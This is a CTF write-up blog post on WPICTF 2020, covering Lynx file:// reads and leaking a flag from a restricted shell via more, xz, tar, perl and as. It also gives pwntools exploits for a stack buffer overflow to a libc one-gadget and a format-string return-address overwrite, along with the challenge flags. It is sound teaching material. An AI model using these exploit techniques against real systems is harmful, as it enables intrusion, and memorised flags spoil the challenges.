avatar

目录
WPICTF 2020 Pwn & Linux Writeup

This writeup has been collected to my pwn notebook. Link

WPICTF 2020 🇺🇸

Sat, 18 April 2020, 05:00 CST — Mon, 20 April 2020, 05:00 CST

Linux

LynxVE (50pt)

Description

ssh ctf@lynxve.wpictf.xyz

pass: lynxVE

made by: acurless

Analysis

Lynx is a text Web-Browser

We can visit local files in this browser by file:// protocol:

bash
1
2
file://localhost/etc/fstab
file:///etc/fstab

Examples from wikipedia

Solution

Type G and input URL=file:/// to visit local files:

Finally we can find flag in folder /home/ctf/ and then read it:

WPI{lynX_13_Gr8or_Th@n_Chr0m1Um}

Suckmore Shell 2.0 (200pt)

Description

After its abysmal performance at WPICTF 2019, suckmore shell v1 has been replaced with a more secure, innovative and performant version, aptly named suckmore shell V2.

ssh smsh@smsh.wpictf.xyz pass: suckmore>suckless

made by: acurless

Solution

Here are some kinds of cmd can use to leak content of files:

  • file viewer (more)
  • compress/decompress cmd (xz, tar, bzip2)
  • Language interpreter/assembler (perl, as )

File viewer

Use more command to view flag directly:

bash
1
2
> more flag
echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}"

Compress/decompress

Some cmd (with or without options) can print content of file during compress/decompress process

bash
1
2
3
> xz flag
�7zXZ�ִF!t/�/echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}"
�r����`�H0�@�>��}YZ> ls
bash
1
2
3
4
5
> tar cvf a.tar flag
flag
> tar xvf a.tar
flag
echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}"
bash
1
2
3
> bzip2 flag
> bzip2 -c -d flag.bz2
echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}"

Language interpreter/assembler

Error information of language interpreter/assembler may print the content of files:

bash
1
2
3
4
5
> perl flag
String found where operator expected at flag line 1, near "echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}""
(Do you need to predeclare echo?)
syntax error at flag line 1, near "echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}""
Execution of flag aborted due to compilation errors.
bash
1
2
3
> as flag
flag: Assembler messages:
flag:1: Error: no such instruction: `echo "WPI{SUckmoreSoftwareN33dz2G3TitTogeTHER}"'

Pwn

dorsia1 (100pt)

Description

http://us-east-1.linodeobjects.com/wpictf-challenge-files/dorsia.webm The first card.

nc dorsia1.wpictf.xyz 31337 or 31338 or 31339

made by: awg

Hint: Same libc as dorsia4, but you shouldn’t need the file to solve.

Attachment

dorsia1 (not given, I download it after getshell)

Analysis

We can get source code of this challenge from the first card:

system+765772 is the address of one gadget in libc2.27, and there is a buffer overflow in stack. So we can overwrite the return address with address of one gadget.

Solution

We can’t get the precise offset between buffer a and return address, but we know the approximate range. So try it:

python
1
2
3
4
5
6
7
8
9
10
11
12
for i in range(4,20):
p = remote('dorsia1.wpictf.xyz',31338)
og = eval(p.recv(14))
print 'og',hex(og)
p.recv()
offset = 69+i
payload = 'A'*offset
payload += p64(og)
print "[+] ",i
print payload
p.sendline(payload)
p.interactive()

final offset is 77

More

you can download full exp from my github

dorsia3 (250pt)

Description

http://us-east-1.linodeobjects.com/wpictf-challenge-files/dorsia.webm The third card.

nc dorsia3.wpictf.xyz 31337 or 31338 or 31339

made by: awg

Attachment

nanoprint, libc

Analysis

The third card:

system-288 is an address of one gadget in libc and a is a buffer in stack. There is a format string vulnerability and we can use it to modify return address to the address of one gadget.

Solution

very common fmtstr attack:

python
1
2
3
4
5
6
7
8
9
10
11
12
stack = eval(p.recv(10))
system = eval(p.recv(10))
info_addr('stack',stack)
info_addr('system',system)
ret = stack+0x71
info_addr('ret',ret)

payload = '%%%dc%%14$hn'%((system)&0xffff) +'%%%dc%%15$hn'%((((system>>16)-(system))%0x10000)&0xffff)
payload = payload.ljust(29,'B')
payload += p32(ret) + p32(ret+2)

sl(payload)

More

you can download full exp from my github

文章作者: TaQini
文章链接: http://taqini.space/2020/04/20/WPICTF-2020-pwn-linux-wp/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 TaQini
打赏
  • Wechat
    Wechat
  • Alipay
    Alipay

评论